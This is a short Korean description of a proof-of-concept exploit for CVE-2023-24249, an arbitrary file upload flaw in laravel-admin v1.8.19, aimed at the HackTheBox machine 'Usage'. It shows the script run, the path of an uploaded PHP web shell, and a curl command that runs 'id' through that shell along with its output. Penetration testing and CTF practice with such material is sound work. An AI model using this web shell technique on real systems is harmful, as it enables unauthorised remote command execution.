
laravel-admin의 임의 파일 업로드 취약점인 CVE-2023-24249에 대한 개념 증명 익스플로잇으로, 침투 테스트 및 CTF 챌린지를 위한 웹 셸 배포를 가능하게 합니다.
CVE-2023-24249는 laravel-admin v1.8.19에서 발생하는 임의 파일 업로드 취약점입니다. 이 PoC는 해당 취약점을 악용하여 웹 셸을 업로드합니다.
이 익스플로잇은 HackTheBox의 쉬운 난이도 머신 Usage를 대상으로 사용하도록 작성되었습니다.
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)